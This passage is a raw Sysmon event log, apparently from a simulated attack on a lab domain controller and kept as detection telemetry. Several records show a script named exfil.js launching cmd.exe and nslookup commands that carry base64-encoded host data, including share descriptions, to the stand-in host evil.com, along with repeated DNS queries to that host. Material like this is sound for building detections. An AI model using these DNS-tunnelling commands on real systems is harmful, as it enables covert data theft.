ows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.795{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.795{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.795{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9D40-000000005F02}3964C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.795{2E1864BB-17C0-629A-9B40-000000005F02}2167756C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-9D40-000000005F02}3964C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.808{2E1864BB-17C0-629A-9D40-000000005F02}3964C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-9B40-000000005F02}216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcpeq.tmp 2>&1 10341000x8000000000000000200855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.779{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9C40-000000005F02}2404C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.779{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9C40-000000005F02}2404C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.779{2E1864BB-17C0-629A-9C40-000000005F02}24042604C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9B40-000000005F02}216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.764{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9C40-000000005F02}2404C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.764{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9B40-000000005F02}216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.764{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.764{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.764{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.764{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.764{2E1864BB-17A1-629A-783D-000000005F02}55526012C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-9B40-000000005F02}216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.768{2E1864BB-17C0-629A-9B40-000000005F02}216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcpeq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.748{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzroa.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000200843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.803{00000000-0000-0000-0000-000000000000}2608evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.694{00000000-0000-0000-0000-000000000000}1144evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.615{00000000-0000-0000-0000-000000000000}7628evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.526{00000000-0000-0000-0000-000000000000}8132evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.448{00000000-0000-0000-0000-000000000000}6892evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.343{00000000-0000-0000-0000-000000000000}4848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.264{00000000-0000-0000-0000-000000000000}2328evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.190{00000000-0000-0000-0000-000000000000}3976evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.084{00000000-0000-0000-0000-000000000000}1908evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.995{00000000-0000-0000-0000-000000000000}7288evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.923{00000000-0000-0000-0000-000000000000}4336evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.840{00000000-0000-0000-0000-000000000000}2132evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.770{00000000-0000-0000-0000-000000000000}2632evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000200830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.732{2E1864BB-17C0-629A-9940-000000005F02}12402652C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9A40-000000005F02}7744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.732{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.732{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.732{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.732{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.732{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9A40-000000005F02}7744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.732{2E1864BB-17C0-629A-9840-000000005F02}57007712C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-9A40-000000005F02}7744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.736{2E1864BB-17C0-629A-9A40-000000005F02}7744C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-9840-000000005F02}5700C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzroa.tmp 2>&1 10341000x8000000000000000200822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.717{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9940-000000005F02}1240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.717{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9940-000000005F02}1240C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.262{00000000-0000-0000-0000-000000000000}2328<unknown process>-udpfalsefalse127.0.0.1-52753-false127.0.0.1-53domain 354300x8000000000000000200819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.262{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52753- 354300x8000000000000000200818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.261{00000000-0000-0000-0000-000000000000}2328<unknown process>-udptruefalse127.0.0.1-52753-false127.0.0.1-53domain 354300x8000000000000000200817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.261{00000000-0000-0000-0000-000000000000}2328<unknown process>-udpfalsefalse127.0.0.1-52752-false127.0.0.1-53domain 354300x8000000000000000200816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.261{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52752- 354300x8000000000000000200815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.261{00000000-0000-0000-0000-000000000000}2328<unknown 